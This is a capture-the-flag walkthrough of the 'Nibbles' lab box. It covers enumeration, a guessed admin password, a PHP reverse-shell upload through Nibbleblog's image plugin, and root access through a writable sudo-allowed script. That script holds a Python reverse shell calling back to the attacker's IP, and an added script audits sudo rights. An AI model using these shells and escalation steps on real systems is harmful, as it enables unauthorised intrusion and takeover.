Nibbles

This box is very straightforward: it teaches enumeration and how to research publicly available exploits for the software you find.

Reconnaissance

# Nmap 7.91 scan initiated Sun Mar 14 00:25:31 2021 as: nmap -sC -sV -p22,80 -oN nibbles.nmap 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up (0.10s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 14 00:25:42 2021 -- 1 IP address (1 host up) scanned in 11.03 seconds

After running the nmap scan, open the web server in a browser and review the page source; it references the /nibbleblog/ directory.

The next step is to visit that directory.

Found Login

The Nibbleblog admin login page is served at /nibbleblog/admin.php.

Default credentials do not work, and the admin panel has a lockout mechanism that bans your IP after repeated failures, so brute-forcing the login is not an option. The password turns out to be nibbles, guessed from the box and application name, which is exactly the kind of password a system administrator with poor practice would use. We'll proceed to finding a username with GoBuster.

Running GoBuster Scan

└─$ gobuster dir --url http://10.10.10.75/nibbleblog/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.75/nibbleblog/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/03/14 18:23:03 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 2987]
/sitemap.php          (Status: 200) [Size: 402] 
/content              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/themes               (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/] 
/feed.php             (Status: 200) [Size: 302]                                             
/admin                (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]  
/admin.php            (Status: 200) [Size: 1401]                                            
/plugins              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/install.php          (Status: 200) [Size: 78]                                              
/update.php           (Status: 200) [Size: 1622]                                            
/README               (Status: 200) [Size: 4628]                                            
/languages            (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]

Found Username and Version

Browsing the directories listed by GoBuster reveals the admin username and the Nibbleblog version (4.0.3, which matches the searchsploit entry below).

Found Exploit

└─$ searchsploit nibble
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
Nibbleblog 3 - Multiple SQL Injections                                               | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)                                | php/remote/38489.rb
------------------------------------------------------------------------------------- ---------------------------------

More information on this exploit is in the Exploit-DB entry listed above (php/remote/38489.rb).

The exploit is straightforward: with valid admin credentials, upload a PHP reverse shell through the My Image plugin, which does not restrict the uploaded file type, then request the uploaded file to execute it.

Uploading Shell

Log in through the admin panel with the password nibbles, as guessed, and upload one of the following shells after editing it with your Kali IP and listener port:

re/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/seclists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php

They should all suffice, so pick your poison.

Uploading Shell in My Images

Set up your listener, then request the uploaded file in the browser to trigger the shell.

┌──(kali㉿kali)-[~/HTB/Nibbles]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.75] 52458
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 18:46:16 up 19 min,  0 users,  load average: 0.00, 0.02, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
nibbler

Once the connection is established, check what the user may run with sudo. A NOPASSWD entry that points at a path inside your own home directory means you control what root executes.

nibbler@Nibbles:/home/nibbler$ sudo -l 
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
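The check above generalises: for every NOPASSWD command in the sudo -l output, what matters is whether the current user can write the target file, or create it when it does not exist yet. The script below is an added example, not part of the original writeup; it parses sudo -l text from stdin and classifies each NOPASSWD path as writable, creatable (the file is missing but its nearest existing parent directory is writable, which is the Nibbles situation) or locked. The file name sudo_audit.sh and the sample sudoers lines in the usage comment are assumptions.

```sh
#!/bin/sh
# Added example, not part of the original writeup: audit `sudo -l` output for
# NOPASSWD commands whose target path the current user controls. sudo only
# matches the path string, so if the file is writable, or missing with a
# writable parent, whatever is placed there runs as root.

# Print the nearest existing ancestor directory of a path.
nearest_existing_dir() {
    d=$(dirname "$1")
    while [ ! -e "$d" ]; do
        d=$(dirname "$d")
    done
    printf '%s\n' "$d"
}

# Classify one absolute path as writable, creatable or locked.
classify_sudo_target() {
    if [ -e "$1" ]; then
        if [ -w "$1" ]; then echo writable; else echo locked; fi
    else
        if [ -w "$(nearest_existing_dir "$1")" ]; then echo creatable; else echo locked; fi
    fi
}

# Read `sudo -l` text on stdin; print "<verdict> <path>" for each NOPASSWD
# command. Comma-separated entries on one line are split first. A
# "(user) NOPASSWD:" tag applies to the entry it precedes; a "(user)" tag
# without NOPASSWD, or an explicit PASSWD: tag, ends the NOPASSWD run.
audit_sudo_nopasswd() {
    nopass=0
    tr ',' '\n' | while read -r entry; do
        case $entry in
            *NOPASSWD:*) nopass=1; entry=${entry##*NOPASSWD:} ;;
            *PASSWD:*)   nopass=0; continue ;;
            \(*\)*)      nopass=0; continue ;;
        esac
        set -- $entry                 # word-split: first word is the command path
        path=${1:-}
        case $nopass$path in
            1/*) printf '%s %s\n' "$(classify_sudo_target "$path")" "$path" ;;
        esac
    done
}

# Usage on the target (assumed file name):  sudo -l 2>/dev/null | sh ./sudo_audit.sh audit
case ${1:-} in
    audit) audit_sudo_nopasswd ;;
esac
```

Run as root everything reports writable, because the -w test reflects root's DAC override; the script is meant to be run as the low-privileged user whose sudo rights you are assessing. Entries such as "(ALL) NOPASSWD: ALL" carry no path and are skipped; they are a separate, immediate win.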

Create the personal/stuff directory under /home/nibbler if it does not already exist, then write a monitor.sh there containing a Python reverse shell that connects back to your Kali listener.

nibbler@Nibbles:/home/nibbler/personal/stuff$ vi monitor.sh 

#!/bin/sh
# connect back to the attacker's listener (Kali IP 10.10.14.31, port 7777)
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.31",7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Make sure the script is executable (chmod +x monitor.sh), set up your listener on port 7777, and execute the created script with sudo. The "unable to resolve host" warning is harmless.

nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh 
sudo: unable to resolve host Nibbles: Connection timed out

Getting ROOT

└─$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.75] 36800
# whoami
root
# ls
bakmonitor.sh
monitor.sh
test.py
# cd /root
# ls
root.txt
